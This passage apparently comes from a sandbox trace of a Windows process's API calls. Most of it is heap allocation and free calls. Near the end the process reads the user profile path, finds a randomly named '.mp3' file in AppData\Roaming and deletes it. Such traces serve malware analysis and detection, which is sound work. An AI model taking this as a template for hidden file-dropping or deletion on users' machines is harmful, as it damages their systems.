(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0207.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.627] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0207.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0207.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0207.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0207.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0207.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0207.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0207.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0207.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0207.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0207.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0207.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.629] CloseHandle (hObject=0x268) returned 1 [0207.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0207.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0207.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0207.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0207.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0207.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.631] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0207.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0207.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0207.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0207.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0207.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0207.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0207.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0207.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0207.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0207.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0207.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0207.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0207.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0207.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0207.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0207.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0207.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0207.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0207.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0207.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0207.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0207.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0207.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0207.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0207.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0207.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0207.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0207.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0207.637] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0207.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0207.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0207.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0207.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0207.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0207.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0207.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0207.638] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0207.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0207.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0207.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0207.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0207.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0207.638] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0207.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0207.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0207.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0207.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0207.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0207.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0207.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0207.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0207.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0207.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0207.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0207.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0207.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0207.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0207.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0207.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0207.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0207.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0207.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0207.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f1fe0 [0207.640] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/_J3DS1U3FLV.mp3", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_J3DS1U3FLV.mp3", lpFilePart=0x8bedfc*="_J3DS1U3FLV.mp3") returned 0x3d [0207.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0207.640] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_J3DS1U3FLV.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_j3ds1u3flv.mp3")) returned 0x2020 [0207.640] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_J3DS1U3FLV.mp3", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87149050, ftCreationTime.dwHighDateTime=0x1d4c7ef, ftLastAccessTime.dwLowDateTime=0x86cd5b30, ftLastAccessTime.dwHighDateTime=0x1d4d542, ftLastWriteTime.dwLowDateTime=0x86cd5b30, ftLastWriteTime.dwHighDateTime=0x1d4d542, nFileSizeHigh=0x0, nFileSizeLow=0x2427, dwReserved0=0xf32, dwReserved1=0x4, cFileName="_J3DS1U3FLV.mp3", cAlternateFileName="_J3DS1~1.MP3")) returned 0xaa5760 [0207.641] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_J3DS1U3FLV.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_j3ds1u3flv.mp3")) returned 1 [0207.645] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87149050, ftCreationTime.dwHighDateTime=0x1d4c7ef, ftLastAccessTime.dwLowDateTime=0x86cd5b30, ftLastAccessTime.dwHighDateTime=0x1d4d542, ftLastWriteTime.dwLowDateTime=0x86cd5b30, ftLastWriteTime.dwHighDateTime=0x1d4d542, nFileSizeHigh=0x0, nFileSizeLow=0x2427, dwReserved0=0xf32, dwReserved1=0x4, cFileName="_J3DS1U3FLV.mp3", cAlternateFileName="_J3DS1~1.MP3")) returned 0 [0207.645] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0207.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0207.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0207.646] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0207.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0207.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0207.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0207.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0207.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0207.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0207.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0207.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0207.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0207.646] CharUpperBuffW (in: 